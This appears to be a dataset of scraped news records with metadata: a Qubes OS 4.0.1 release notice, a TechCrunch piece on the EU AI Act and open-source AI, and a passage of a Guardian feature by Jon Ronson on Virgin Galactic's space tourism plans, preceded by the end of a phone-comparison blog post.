Some Android makers deliver good battery life, but not all. Also, it’s kind of a habit to close all apps in Android to keep those apps from doing silly things that drain the battery.
I hope 2 system can compete each other so we can see more improvement. | true | true | true | I wrote perhaps my most popular blog post ever just over 2 months ago. I talked about how I bought, used, and subsequently didn’t like the iPhone 6. I would be sticking with Android…or so I thought. Shortly after that post got popular, I was compelled to take another look at iOS. There were 2 factors in my first trial with the... | 2024-10-12 00:00:00 | 2015-08-02 00:00:00 | article | casabona.org | Joe Casabona | null | null |
|
18,862,000 | https://www.qubes-os.org/news/2019/01/09/qubes-401/ | Qubes OS 4.0.1 has been released! | Marek Marczykowski-Górecki | # Qubes OS 4.0.1 has been released!
We’re pleased to announce the release of Qubes 4.0.1! This is the first stable patch release of Qubes 4.0. It includes many updates over the initial 4.0 release, in particular:
- All 4.0 dom0 updates to date, including a lot of bug fixes and improvements for GUI tools
- Fedora 29 TemplateVM
- Debian 9 TemplateVM
- Whonix 14 Gateway and Workstation TemplateVMs
- Linux kernel 4.14
Qubes 4.0.1 is available on the Downloads page.
## What is a patch release?
A patch release does not designate a separate, new major or minor release of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.0) inclusive of all updates up to a certain point. Installing Qubes 4.0 and fully updating it results in the same system as installing Qubes 4.0.1.
## What should I do?
If you’re currently using an up-to-date Qubes 4.0 installation (including updated Fedora 29, Debian 9, and Whonix 14 templates), then your system is already equivalent to a Qubes 4.0.1 installation. No action is needed.
Similarly, if you’re currently using a Qubes 4.0.1 release candidate (4.0.1-rc1 or 4.0.1-rc2), and you’ve followed the standard procedure for keeping it up-to-date, then your system is equivalent to a 4.0.1 stable installation, and no additional action is needed.
If you’re currently using Qubes 4.0 but don’t have these new templates installed yet, we recommend that you follow the appropriate documentation to do so:
Regardless of your current OS, if you wish to install (or reinstall) Qubes 4.0 for any reason, then the 4.0.1 ISO will make this more convenient and secure, since it bundles all Qubes 4.0 updates to date. It will be especially helpful for users whose hardware is too new to be compatible with the original Qubes 4.0 installer. | true | true | true | We’re pleased to announce the release of Qubes 4.0.1! This is the first stable patch release of Qubes 4.0. It includes many updates over the initial 4.0 release, in particular: All 4.0 dom0 updates to date, including a lot of bug fixes and improvements for GUI tools Fedora 29 TemplateVM... | 2024-10-12 00:00:00 | 2019-01-09 00:00:00 | article | qubes-os.org | Qubes OS | null | null |
|
32,747,436 | https://techcrunch.com/2022/09/06/the-eus-ai-act-could-have-a-chilling-effect-on-open-source-efforts-experts-warn/ | The EU's AI Act could have a chilling effect on open source efforts, experts warn | Kyle Wiggers | The nonpartisan think tank Brookings this week published a piece decrying the bloc’s regulation of open source AI, arguing it would create legal liability for general-purpose AI systems while simultaneously undermining their development. Under the EU’s draft AI Act, open source developers would have to adhere to guidelines for risk management, data governance, technical documentation and transparency, as well as standards of accuracy and cybersecurity.
If a company were to deploy an open source AI system that led to some disastrous outcome, the author asserts, it’s not inconceivable the company could attempt to deflect responsibility by suing the open source developers on which they built their product.
“This could further concentrate power over the future of AI in large technology companies and prevent research that is critical to the public’s understanding of AI,” Alex Engler, the analyst at Brookings who published the piece, wrote. “In the end, the [E.U.’s] attempt to regulate open-source could create a convoluted set of requirements that endangers open-source AI contributors, likely without improving use of general-purpose AI.”
In 2021, the European Commission — the EU’s politically independent executive arm — released the text of the AI Act, which aims to promote “trustworthy AI” deployment in the EU. As they solicit input from industry ahead of a vote this fall, EU institutions are seeking to make amendments to the regulations that attempt to balance innovation with accountability. But according to some experts, the AI Act as written would impose onerous requirements on open efforts to develop AI systems.
The legislation contains carve-outs for *some* categories of open source AI, like those exclusively used for research and with controls to prevent misuse. But as Engler notes, it’d be difficult — if not impossible — to prevent these projects from making their way into commercial systems, where they could be abused by malicious actors.
In a recent example, Stable Diffusion, an open source AI system that generates images from text prompts, was released with a license prohibiting certain types of content. But it quickly found an audience within communities that use such AI tools to create pornographic deepfakes of celebrities.
Oren Etzioni, the founding CEO of the Allen Institute for AI, agrees that the current draft of the AI Act is problematic. In an email interview with TechCrunch, Etzioni said that the burdens introduced by the rules could have a chilling effect on areas like the development of open text-generating systems, which he believes are enabling developers to “catch up” to Big Tech companies like Google and Meta.
“The road to regulation hell is paved with the EU’s good intentions,” Etzioni said. “Open source developers should not be subject to the same burden as those developing commercial software. It should always be the case that free software can be provided ‘as is’ — consider the case of a single student developing an AI capability; they cannot afford to comply with EU regulations and may be forced not to distribute their software, thereby having a chilling effect on academic progress and on reproducibility of scientific results.”
Instead of seeking to regulate AI technologies broadly, EU regulators should focus on specific applications of AI, Etzioni argues. “There is too much uncertainty and rapid change in AI for the slow-moving regulatory process to be effective,” he said. “Instead, AI applications such as autonomous vehicles, bots, or toys should be the subject of regulation.”
Not every practitioner believes the AI Act is in need of further amending. Mike Cook, an AI researcher who’s a part of the Knives and Paintbrushes collective, thinks it’s “perfectly fine” to regulate open source AI “a little more heavily” than needed. Setting any sort of standard can be a way to show leadership globally, he posits — hopefully encouraging others to follow suit.
“The fearmongering about ‘stifling innovation’ comes mostly from people who want to do away with all regulation and have free rein, and that’s generally not a view I put much stock into,” Cook said. “I think it’s okay to legislate in the name of a better world, rather than worrying about whether your neighbour is going to regulate less than you and somehow profit from it.”
To wit, as my colleague Natasha Lomas has previously noted, the EU’s risk-based approach lists several prohibited uses of AI (e.g. China-style state social credit scoring) while imposing restrictions on AI systems considered to be “high-risk” — like those having to do with law enforcement. If the regulations were to target product types as opposed to product categories (as Etzioni argues they should), it might require thousands of regulations — one for each product type — leading to conflict and even greater regulatory uncertainty.
An analysis written by Lilian Edwards, a law professor at Newcastle Law School and a part-time legal advisor at the Ada Lovelace Institute, questions whether the providers of systems like open source large language models (e.g. GPT-3) might be liable after all under the AI Act. Language in the legislation puts the onus on downstream deployers to manage an AI system’s uses and impacts, she says — not necessarily the initial developer.
“[T]he way downstream deployers use [AI] and adapt it may be as significant as how it is originally built,” she writes. “The AI Act takes some notice of this but not nearly enough, and therefore fails to appropriately regulate the many actors who get involved in various ways ‘downstream’ in the AI supply chain.”
At AI startup Hugging Face, CEO Clément Delangue, counsel Carlos Muñoz Ferrandis and policy expert Irene Solaiman say that they welcome regulations to protect consumer safeguards, but that the AI Act as proposed is too vague. For instance, they say, it’s unclear whether the legislation would apply to the “pre-trained” machine learning models at the heart of AI-powered software or only to the software itself.
“This lack of clarity, coupled with the non-observance of ongoing community governance initiatives such as open and responsible AI licenses, might hinder upstream innovation at the very top of the AI value chain, which is a big focus for us at Hugging Face,” Delangue, Ferrandis and Solaiman said in a joint statement. “From a competition and innovation perspective, if you already place overly heavy burdens on openly released features at the top of the AI innovation stream you risk hindering incremental innovation, product differentiation and dynamic competition, this latter being core in emergent technology markets such as AI-related ones … The regulation should take into account the innovation dynamics of AI markets and thus clearly identify and protect core sources of innovation in these markets.”
As for Hugging Face, the company advocates for improved AI governance tools regardless of the AI Act’s final language, like “responsible” AI licenses and model cards that include information like the intended use of an AI system and how it works. Delangue, Ferrandis and Solaiman point out that responsible licensing is starting to become a common practice for major AI releases, such as Meta’s OPT-175 language model.
“Open innovation and responsible innovation in the AI realm are not mutually exclusive ends, but rather complementary ones,” Delangue, Ferrandis and Solaiman said. “The intersection between both should be a core target for ongoing regulatory efforts, as it is being right now for the AI community.”
That well may be achievable. Given the many moving parts involved in EU rulemaking (not to mention the stakeholders affected by it), it’ll likely be years before AI regulation in the bloc starts to take shape. | true | true | true | As written, the European Union's AI Act, which seeks to regulate certain types of AI systems, could impose onerous requirements on open source developers, some experts believe. | 2024-10-12 00:00:00 | 2022-09-06 00:00:00 | article | techcrunch.com | TechCrunch | null | null |
|
7,279,347 | http://www.theguardian.com/science/2014/feb/21/jon-ronson-virgin-galactic-richard-branson-future-atronauts | Jon Ronson is ready for blast-off. Is Richard Branson? | Jon Ronson | It’s dawn at the Mojave Air & Space Port, a cluster of weather-beaten hangars in the desert north of Los Angeles. It looks quite forlorn, in part an elephant’s graveyard for half-finished prototype jets designed by visionaries who ran out of money. But it’s also a gathering place for freewheeling, maverick space engineers to try out new ideas in the desert: the rocket world’s wild west.
A fleet of coaches pulls up outside a hangar. The passengers, coiffured and rich-looking, climb out. The men wear shirts with logos for places such as the Monte-Carlo Polo Club. The women wear the kind of leopard print blouses you see in fashion boutiques in five-star hotels. They are led inside the hangar and take their seats.
“Welcome to the world’s largest ever gathering of future astronauts,” says the man on the stage, Sir Richard Branson. “As part of our wonderful, pioneering future astronaut community, your place in history is assured.”
So far, nearly 700 people have paid either $200,000 or $250,000 (£125,000 or £155,000) for a two-hour trip into space inside the Virgin Galactic SpaceShipTwo, a trip that includes five minutes of weightlessness. (Virgin raised the price by $50,000 in May 2013 to adjust for inflation: some future astronauts paid their $200,000 as long ago as 2004, when tickets first went on sale and Branson predicted a 2007 launch. Tom Hanks has booked, along with Angelina Jolie and Princess Eugenie.) Four hundred of them are in Mojave today, for speeches, a cocktail party and to witness a test flight. This, unfortunately, has just been cancelled due to high winds. (It doesn’t feel that windy.)
I’m here because the pronouncement Branson just made from the stage is probably not an exaggeration. These men and women are standing on the edge of history – pioneers in the sort-of-democratisation of space travel. Only 530 humans have been into outer space, which is defined as 100km (62 miles) above sea level. Branson is talking about putting that many people up there in his first year of operation. And it’s about to happen, he says. It has been 23 years since he registered the name Virgin Galactic Airways, and 10 since they started building the spaceship – an enterprise stricken by delays and tragedy. Now they’re only months away. Branson says the first unmanned test flight will take place “soon”; he and his children will take the first commercial space flight later this year.
I am at a table towards the back of the hangar, listening to the speeches with future astronaut Trevor Beattie. He’s the working-class Birmingham boy who made his millions as an ad man – famous for Wonderbra’s Hello Boys posters, and French Connection’s FCUK campaign, as well as the 2001 and 2005 New Labour election campaigns for his friend Peter Mandelson.
“Some say Nasa sent the wrong people into space,” Trevor tells me quietly. “Nasa sent scientists and engineers. When they came back, they either got God or became poets. So what happens this time, when you send creative people? Do we come back as engineers and scientists? What will it do to the other side of our brains?”
“Maybe it’ll fuck you up,” I whisper back.
“I talked to someone who went on the Zero G,” Trevor replies. “He said that after he came back down, he found gravity a real drag.”
The Zero G is a specially modified plane that, for $4,950 per passenger, creates weightlessness by performing aerobatic manoeuvres known as parabolas. Branson has been recommending that all future astronauts take a flight on it in preparation for the real thing. Trevor will take his tomorrow, 30,000ft above Burbank, California. He promises to let me know if weightlessness is all it’s cracked up to be.
Now Virgin Galactic’s CEO, George Whitesides, is on the stage. He surveys the room. “You are truly,” he says, “the first in a new class of citizen explorer.”
In the mid-80s, the then Soviet president Mikhail Gorbachev invited Branson to be the first civilian in space. He asked Gorbachev’s people how much it would cost – $50m, they said, “plus I’d need to spend two years training in Russia, which was too much of my time,” Branson tells me. “And I thought it wouldn’t look quite right somehow. Then I thought, wouldn’t it be better to spend that $50m building a spaceship company instead?”
We’re sitting in a small meeting room behind the Virgin hangar at the Mojave Air & Space Port. All this is a first for Branson. He’s never created an industry from scratch before. His other endeavours have been about sprucing up existing worlds: credit cards, record labels. Not many people go from putting out the Sex Pistols to creating a new dawn for humanity. As Whitesides will later tell me, “This is the start of something really big – humanity going into the cosmos. Nasa’s gone. The Russians have gone. But this is the start of the rest of us going. I really think there is a power in this moment in time in history.”
So how did Branson persuade himself he could do it? “At the time we put out the Sex Pistols, people thought we were taking a giant risk,” he says. “Then the train network. Each of these was a building block that gave me the confidence to dream even bigger. When I started Virgin Atlantic, I knew nothing about running airlines. I just felt somebody should be able to do it better than British Airways. By then I’d learned what a company is. A company is, you go and find the best people. We got the chief technical officer from British Caledonian, so we knew it was going to be safe, then we got a lot of creative people who weren’t from the airline world to go and shake up the business. Starting a spaceship company is not that dissimilar.”
The first 10 years were, he says, a fruitless trek around the world, visiting garages in the middle of nowhere to hear crazy pitches from father-and-son rocket design teams. “It was surprising how few of them really had credible, serious ideas,” he says. “The biggest worry I had was re-entry. Nasa has lost about 3% of everyone who’s gone into space, and re-entry has been their biggest problem. For a government-owned company, you can just about get away with losing 3% of your clients. For a private company you can’t really lose anybody. Nobody we met had anything but the conventional risky re-entry mechanism that Nasa had. We were waiting for someone to come up with one that was foolproof.”
He says those 10 years were frustrating, but when I ask if he ever lost his temper, he says, “Oh, I would find that very counterproductive. I was brought up by parents who, if I ever said a bad word about somebody, would send me to the mirror and make me look in it and tell me how badly it reflected on myself.” He pauses. “Anyway. Finally we met Burt Rutan.”
Burt Rutan is the reason for all this. If, in the coming months and years, we are all shooting up and down to outer space, we’ll have Rutan to thank. In photographs, he looks rugged and outdoorsy, with country-singer hair and big sideburns. He’s a legend in aerospace circles. In 1986, he built the first plane to fly around the world on a single tank of fuel. In the mid-90s, he set about trying to solve the re-entry problem.
Rutan, who is now 70, had an advantage over Nasa. If you’re coming back from Mars, you re-enter the Earth’s atmosphere at 12km a second. The heat and the friction at that speed can tear a machine apart. But coming back from a suborbital flight – which was the puzzle Rutan was trying to solve – the spaceship would be going a lot slower. But it would still need something to slow it down.
“Burt Rutan’s idea was to turn a spaceship into a giant shuttlecock,” Branson says. “And so the pilot could be sound asleep on re-entry and it didn’t matter what angle it hit coming back into the Earth’s atmosphere.”
Rutan didn’t go to Branson for funding. He went to Paul Allen, the co-founder of Microsoft. Allen was famous for lavishing money on space projects, such as the $30m he gave the Seti Institute (Search for Extraterrestrial Intelligence) to build an array of receivers to constantly listen out for signals from other planets, so far in vain. Allen gave Rutan $20m. Their aspiration, Branson says, was never more than academic. They would build a prototype – SpaceShipOne – fly it into space twice, and win the X Prize. This was a 2004 competition with a $10m prize for the first privately funded company to fly a reusable space ship into space twice. Then they’d retire SpaceShipOne to the Smithsonian, where it would end its days hanging from the ceiling. All of this did, indeed, happen. SpaceShipOne now hangs next to the Spirit of St Louis in the Smithsonian’s Milestones of Flight gallery in Washington DC.
“And that was to be the end of it,” Branson says. “Paul Allen is someone who loves to see what’s possible, but he’s not that interested in running a commercial business. So I went to see him at his house in Holland Park. I told him I thought he was missing a trick, and we would love to take it forward. So we bought the technology off him. We managed to get a group of engineers together and we started to build SpaceShipTwo.”
SpaceShipOne had been filled with “single point failures”. “If one bolt falls off and you die, that’s a single point of failure,” the Virgin Galactic engineer, Matt Stinemetze, told Wired magazine in March 2013. “There were things that you probably would’ve done differently if you’re going to carry Angelina Jolie.”
For SpaceShipTwo, Rutan’s engineers had to turn the prototype into something that could go to space “100 times, maybe 1,000 times”, Branson tells me. Developing the rocket motor has been the hardest challenge, followed by modifying the electric actuator – the mechanism that enables the pilot to move the stabiliser, the big part of the tail. SpaceShipOne had one. For SpaceShipTwo they built two in series, so one can fail and it will still work.
Every addition to the prototype needed to be as light as possible – any superfluous weight will eat into the already meagre weightless minutes. Within this constraint, they had to decide how many passengers to take. They settled on six and two pilots, and built a ship 1.6 times bigger than the original.
In 2004, even though they were still – they thought – three years from launching people into space, Virgin opened a reservations website. It crashed under the weight of interest. The first people to pay their deposits included George Whitesides, who back then was chief of staff for Nasa, Trevor Beattie and the Dallas actor Victoria Principal. The Virgin Galactic designers polled these early future astronauts. What did they want out of the experience? They wanted to see Earth from space. They wanted a really good view. So Virgin put in lots of windows. For the interior design they appointed Adam Wells, the man who invented the Virgin Atlantic flat bed and the purple mood-lit Virgin America cabin. He went for white and silver – colours that would “not draw attention to themselves and instead get out of the way of the incredible things happening outside the window”.
Wells is telling me this by phone a few weeks later. He doesn’t sound too happy about the white and the silver. “Longer term, I have ideas about how that might evolve,” he says. “But we need to get up to space to see how those colours perform, what sort of behaviours people have with them.”
There won’t be much fabric on board, Wells adds, fabric being an unnecessary weight, and definitely no leather. “Leather would be a temptation for a high-end product, but it would be an odd thing to line the interior of your state-of-the-art spacecraft with a fellow earthling’s skin.” He pauses. “We think about this stuff a lot – about what’s right and wrong.”
Then he adds that everything he’s telling me is “all under wraps”.
“These are scoops?” I ask.
“Yeah,” he says. “This is good info.”
SpaceShipTwo won’t have a flight attendant – there will be no drinks service or anything like that – and no toilet. Every passenger will be invited to wear a special astronaut nappy, or maximum absorbency garment, under his or her flight suit, which hasn’t yet been designed.
“I met your sister Vanessa once,” I tell Branson. “She told me you’re psychologically different in some way. Like you have a restlessness – an itch that constantly needs scratching. Are you psychologically different in some way?”
He shifts in his chair. “I think that’s possible,” he replies. “I will feel guilty if I’m not trying to achieve something.”
“So if a day passes when nothing’s been achieved, do you see that as a bad day?” I ask.
“Definitely,” he says. “Yeah. We weren’t allowed to watch television as kids. We were told we had to be climbing trees or creating things. I’m sure that if I found myself watching television, I’d feel slightly uncomfortable.”
“How long do you have to not achieve something before you start feeling guilty?” I ask. “An hour?”
“Oh, it’s not very long,” he says.
He glances at a painting on the wall of SpaceShipTwo in an attempt, I suspect, psychically to will me to remember what I’m supposed to be interviewing him about.
“Well, your psychological distress is for the benefit of others,” I finish, “because you’ve really made my life better, especially with Virgin Atlantic and Virgin America.”
“Fantastic,” he whistles. “For a Guardian journalist to say that, particularly, thank you.”
When our interview is over, I drive out of the Mojave Space Port towards Los Angeles. I pass the spot where, on a boiling hot afternoon – 26 July 2007 – Rutan’s team was testing rocket propellant for Virgin Galactic when a tank of nitrous oxide exploded. There had been 17 people watching the test out here in the desert, this place for maverick engineers to push the boundaries. Shards of carbon fibre shot into them. Three of Rutan’s engineers were killed, and three others seriously injured.
“It turned Burt Rutan from a young man into an old man overnight,” Branson told me. “He’d never lost anybody in his life.”
Rutan’s company was found liable and fined $25,870. As the science writer Jeff Hecht wrote in New Scientist, “The company has an enviable reputation for creativity, but the report suggests it did not have an obsession with training, rules and written procedures… a dangerous combination when working with rocket fuels.”
Rutan quit the business in 2011. He retired to the lakes of Coeur d’Alene, Idaho, a climate about as far from Mojave as is possible to find. He didn’t respond to my emails asking for an interview.
When I asked Branson how personally connected he felt to the three deaths, he said, “Well…” Then he stopped. “If they were working directly for me, I would feel very responsible. Obviously, if we hadn’t decided to do the programme in the first place, they would be alive today. So you realise that. But talking to relatives and survivors – I think every one of the survivors came back to work with the rocket company afterwards. Everybody had to pick themselves up and move forwards, and everybody did.”
Paris Hilton is a future astronaut. So are Justin Bieber and Lady Gaga. Of course, regular aviation began this way, too, with the elite putting down the big money first. Ashton Kutcher is another future astronaut, as is Vasily Klyukin. He’s a 37-year-old property developer and skyscraper designer from Russia. His ticket cost him just over £1m. He outbid everyone at an auction in support of Aids research at last year’s Cannes film festival. The prize was a trip into space with a mystery companion, who turned out to be Leonardo DiCaprio.
“My desire was to win!” Klyukin emails me. “I am a man, and men had to win. Space is the Olympic gold medal in the ‘Adventures’ nomination and cannot be conquered by everyone.” He adds that he was swept up in the glamour of the night, too – the auction was full of Victoria’s Secret angels. But he has no regrets, no buyer’s remorse. In fact, as a surprise for Branson, he’s designed a Virgin Galactic-shaped skyscraper. He emails me a mock-up of how it would look next to the Gherkin in central London.
Then he unexpectedly invites me on a two-week transatlantic voyage on board his friend’s 228ft super-yacht, the Sherakhan: “Very rare invitation! It would be two incredible weeks. Usually it costs a lot, about €1m [£850,000].” I consider his offer for a long time, but eventually decline, because frankly two weeks is a long time to be in the middle of the Atlantic with a Russian billionaire I don’t know, and I think it would get awkward.
A week passes. I telephone Trevor Beattie to ask how his zero-gravity flight went.
“Um…” he replies. “OK. Where do I start? So. Being on the Zero G is like being flown in a hollowed-out Boeing over a hump. You float around uncontrollably for 30 seconds. Everyone does their swimming action, but it does no good. Then they shout an order: ‘FEET DOWN! FEET DOWN!’ That tells you you’ve got three seconds before the gravity comes back on and you splat back to the floor again. You try and get in a vertical position, so when the gravity comes on, you hit the deck ready for the next parabola. Which I very sensibly did.” Trevor coughs. “Except, when I looked up, there was a bloke about two and a half times my bodyweight who was still floating 10ft above me at zero gravity. Then I realised I was in some kind of Wile E Coyote cartoon. There wasn’t much I could do about it. The gravity came on and he came down like a fucking ton of bricks.”
“Oh my God,” I say.
“I tried to pull everything out of the way,” Trevor says. “The only thing I couldn’t extract was the end of my left foot, so I ended up with a fractured toe.”
“Bloody hell,” I say.
“Anyway,” Trevor continues, “I didn’t want to abort the flight, so I lumbered on. We did a few more parabolas. Then we came back. I had to get a taxi straight across town to LAX, so by the time the adrenaline wore off and I was on a 10-hour flight to London, I was a bit of a mess.”
“This is hilarious,” I say.
“The doctors thought so, too,” Trevor says.
It’s two weeks later. I’m sitting with Richard Branson in a hotel room in Washington DC. He is in town for a conference about the war on drugs. I’m here because my time with him in Mojave was short and there were many things I didn’t have time to ask. Particularly, what will space travel on Virgin Galactic actually feel like? I can’t picture it.
“Well, it’s all in our imagination at the moment,” Branson says.
Then he tries to explain.
It will all begin in the deserts of New Mexico, inside a spaceport, Spaceport America, designed by Norman Foster. The building is already finished (although the interiors are still to be done). The photographs make it look incredible – vast but almost invisible, as if it’s growing out of the horizon, the same rust colour as the sand around it and the mountains beyond. It cost $212m – paid for by New Mexico taxpayers – and was built so far out in the middle of nowhere that they had to construct 16km of road just to connect it to the nearest tarmac.
Later, Virgin Galactic’s Whitesides will describe the spaceport to me over the phone as “a welcoming cradle for this band of explorers, something sleek in the sense of 2001: A Space Odyssey, but friendly in the sense of the Virgin Heathrow lounge. People will see it and think, ‘Yes, this is the place I should be flying to space from. This is appropriate.’”
Future astronauts will spend three days at the Spaceport for safety training and to pre-acclimatise themselves to the “sights and sounds” of space travel. “So you’re not going to be doing everything for the first time on the flight,” Adam Wells says. There’ll be a simulator to reproduce the various thumps and bangs, “so when you hear some sort of clunking sound, you’ll know it’s because the landing gear has just gone up or down.” Without all this, Wells says, there’ll be “a real risk of sensory overload on the flight. You’ll be bombarded with so much that’s new to you, your memory won’t be able to log it and fix it in place.” And you’ll come back to Earth remembering nothing much.
Also, during those three days, Wells’s people will take your measurements, because “we’re effectively rebuilding the seat for each customer”. This is for the G-force part of the trip. It’s much less unpleasant if the Gs are concentrated in your chest, so the personalised seat configuration will help with that. And then, on day three, you’ll climb into SpaceShipTwo.
You will begin its flight attached to a plane with two fuselages – WhiteKnightTwo. It will feel like a normal takeoff and a normal flight until you reach 50,000ft. “At 50,000ft the sky is a much deeper blue,” Whitesides tells me. “The vast majority of humanity hasn’t been to 50,000ft. Anyway, you get up to 50,000ft and then you have the release and you’ll feel a sense of instantaneous weightlessness as the vehicle drops away. That’ll last a couple of seconds. And then the pilot turns the vehicle upwards and launches the rocket motor.”
“Suddenly, then,” Branson says, “you’re going from zero to 2,500mph in eight seconds. That’s going to be a rush you’ll never experience again in your life. You’ll go from tremendous noise, you’ll feel it through your body, and then the absolute beauty comes when the motor cuts and it’s just this total… silence.”
“The instant that the rocket motor shuts off, literally everything inside the cabin becomes weightless,” Whitesides says. “You’re still going up at a tremendous velocity, but once that motor is off, the pilot will initiate the space phase of the mission. He’ll tell people that they’re able to get out of their seats and float around the cabin.”
“The seating system reconfigures itself,” Wells says, “so you don’t have to think about putting the seat in the right position. It’s going to do it itself. The customers’ time is incredibly valuable while on this flight, and the last thing we want to do is burden you with responsibilities to move things around or to remember something or to handle something that would be tricky in any way. We want it to be completely intuitive.”
“There are plenty of windows and plenty of room,” Branson says, “and you just levitate out of your seat and float around and look back on Earth and you’ll be one of only 500 people who have ever been into space.”
“You’ll reach the point of maximum altitude and start to come back down,” Whitesides says, “like a ball being thrown up with one hand and caught with the other hand. Once you get closer – perhaps 30 seconds from atmospheric re-entry – you’ll get above your seat and gently sink back down and put your seatbelt back on. And you’ll get ready for re-entry.” And then, as the Virgin Galactic website promises: “Later that evening, sitting with your astronaut wings, you know that life will never quite be the same again.”
“So Trevor Beattie went on the Zero G flight the other day and a man was floating above him and then the gravity came back on and he fell on him,” I tell Branson.
“A man fell on Trevor Beattie?” he says.
“He broke his foot,” I say.
“Trevor did?” Branson says.
I nod.
“Oh dear,” Branson says.
“Doesn’t Trevor Beattie’s broken toe show the dangers of what happens when the gravity comes back on?” I say.
He frowns at me. “We’ll give you warning and make sure you don’t get a broken toe,” he replies. “Buzz Aldrin told me, ‘Just enjoy space. Don’t do the Zero G. With the Zero G, they put you through 15 parabolas. In space, you’ve just got one beautiful parabola.’”
One month later, I am about to become weightless in a hollowed-out Zero G plane in the air above Fort Lauderdale, Florida. There are no Virgin Galactic future astronauts on this flight. Instead, there are 20 or so honeymooners, retirees, vacationers. We lie on padded mats on the plane’s floor, waiting for the weightlessness to start. When it does, it is at first bewildering. You suddenly levitate, as if you’re in a magic trick. You’re Sandra Bullock in Gravity, except instead of debris crashing into you, it’s tourists from New Zealand and Brazil. There is chaos and injury potential. At the back are rows of airline seats. If you don’t quickly learn to control your movements while you’re weightless, you might drift over them and plummet when the gravity comes back on. We land on the mat with a very big splat.
Each parabola lasts 30 seconds. There are 15 in all – apparently the optimum number before people start to vomit (Nasa puts its trainee astronauts through something like 60 parabolas and violent retching is the norm). By the third parabola, you realise you are no longer bewildered. You can handle it. And that’s when you become magnificent.
As I somersault, I remember something a Virgin Galactic future astronaut told me over the telephone last week. His name is Yanik Silver and his company, Maverick Business Adventures, organises adrenaline holidays for “exclusive” clients. The introductory video on its website makes it clear that you probably shouldn’t put your name forward for one of Yanik’s trips because he’s very selective and you’re “probably not right”. It’s solely for “entrepreneurs or CEOs or business owners who live life to the fullest and want to create incredible breakthroughs in their business… If you’re a top-gun entrepreneur, there’s not that many people who will understand you, and who better to go on those incredible adventures where success and high-achieving is the norm, instead of people secretly wishing you would fail?”
I think Yanik is in some ways a quintessential Virgin Galactic future astronaut. Back in Mojave, another CEO had told me that he considered being a space adventurer and being an entrepreneur to be much the same thing – with both, you need to leap fearlessly into the unknown, demonstrating a courage that others lack (although when I repeated that to Beattie, he laughed and said, “How self-important!”). Yanik takes his specially selected CEOs scuba diving between the tectonic plates in Iceland, and high-speed evasive driving, and on Zero G flights. He told me something miraculous happens to a business brain during those pumped moments: “You get new ideas, new pathways in your thinking.” I asked him at what point the new ideas present themselves. Is it while you’re plummeting to the ground before the parachute opens? He said no, it’s usually back in the hotel bar later that night. Perhaps Yanik is right. Maybe I will get a new idea at some point later today. I am, after all, lost in the moment, which is rare for me. But then something unfortunate happens.
The Zero G on-board photographer beckons me to float towards him and the instant I concentrate on the manoeuvre the nausea begins. It is a cold, wet, overwhelming, hellish nausea. And it only gets worse with each subsequent parabola. The Zero G people would call this a successful flight, because no actual vomiting occurs. But I don’t consider myself a Zero G success story. As I float in a clammy sweat and watch my fellow weightless people joyfully catch droplets of water in their mouths, I suddenly remember how – many years ago – a man had told me he’d taken part in group sex.
“What was it *like*?” I’d asked him.
He frowned. “Honestly,” he said, “it’s better to watch than to actually do.” There are a lot of awkward physical realities involved, he explained. It’s best to spare yourself and just spectate.
Will commercial space travel really be as safe and awesome as Branson says? Who’d have the experience to answer these questions without any of the vested interests? An astronaut. A non-aligned astronaut. So I telephone Chris Hadfield.
Hadfield is the Canadian astronaut who became famous for posting a video of himself singing Space Oddity during his five weightless months on board the International Space Station. I describe my Zero G experience to him. Is that what real space is like?
“Oh no,” he says. “On the Zero G, you’re weightless and then squished, and weightless and then squished. It’s nauseating because it’s cyclic. You said yourself that the first few parabolas were fine.” Prolonged weightlessness, he says, “is just magic. You had it for 30 seconds and it’s not very good weightlessness. The pilots do their best, but you still occasionally bang people off the ceiling, and it’s still very short. To have it last for ever is so much fun. It’s such a joy. So delight-filled. And then you look out the window and the whole world is pouring by at eight kilometers a second. So you’ve got the grace of weightlessness and the gorgeousness and richness of looking at the world. I loved every second of it.”
“And the splatting?” I say. “Will there be lots of future astronauts with broken toes?”
“Oh, it’ll be nothing like that,” he says. “It’ll be much more gradual. The upper edges of the atmosphere are very wispy. You will have seen the worst case on the Zero G from a nausea and a transition point of view.”
I tell him how Branson had described Rutan’s shuttlecock mechanism as “foolproof”, and said that the pilot could be “sound asleep on re-entry and it didn’t matter”.
There’s a short silence. “Hmm,” he says, sounding doubtful. “He’s right – it *is* a simple, rugged mechanism that is reusable. It’s a nice, elegant solution. It’s a good design. But it’s not risk-free, and it’s complex. They’re working very hard – they’ve got experienced engineers and pilots to make it as safe as possible. But to come into any programme with any vehicle and think you’re somehow immune from what everybody else has always experienced with every machine in history is unrealistic. They don’t know everything yet. They still have a lot to learn. If they fly it 100 times, maybe they can be careful and judicious enough to avoid a crash. If they fly it forever, eventually one of them will crash. That’s just statistics. It could well be something that nobody anticipated. That’s normally how it happens with complex machines.” He pauses. “I’m just being realistic.”
I ask if he thinks the future astronauts will enjoy their experience.
“They’ll go very, very fast,” he replies. “That’ll be really thrilling. They’ll see directly with their own eyes something that very few human beings have seen: what the world looks like from above the atmosphere. But if they think they’re going to see the stars whipping by, or they’ll be going around the world several times, then they’re incorrect. And they’re going to be disappointed.” He pauses. “I went around the world something like 2,500 times. I saw thousands of sunrises and sunsets and all of the continents. Whereas this vehicle will go straight up and straight down again. That doesn’t belittle anything. They’ll get some of the same views. But it’s a different experience.”
I think Hadfield is concerned he is maybe sounding too sniffy, because now he says, “Richard Branson and his team are being very brave. Both financially and from an exploration point of view, they’re trying to do something nobody has done before. This is brand new.” He says that as long as the future astronauts manage their expectations, as long as they “plan for it, ask themselves, ‘What am I going to do with my minutes of weightlessness?’ so they don’t come down and say, ‘Huh. That’s not what I was expecting’, they’re going to love what’s happening.”
Two weeks later I receive an email I hadn’t expected at all: “I am in Buenos Aires on vacation. I will be at home in Idaho on Saturday and happy to talk to you after that.”
It is Burt Rutan.
I call him the day his cruise docks – this semi-reclusive engineering genius. I say that future generations might regard him as the Brunel of democratised space travel; does he think about things like that?
“Only since my retirement…” he says. He’s got a rich, deep American-South voice. Then he tells me why all this began for him.
“In the mid-60s, a friend of mine, Mike Adams, got killed during a re-entry.” They had been stationed together at the Edwards Air Force base in Lancaster, California, when Adams, test flying an experimental suborbital plane called the X-15, “didn’t line the angles up. He was killed because the requirement to do a precision re-entry had not been met.”
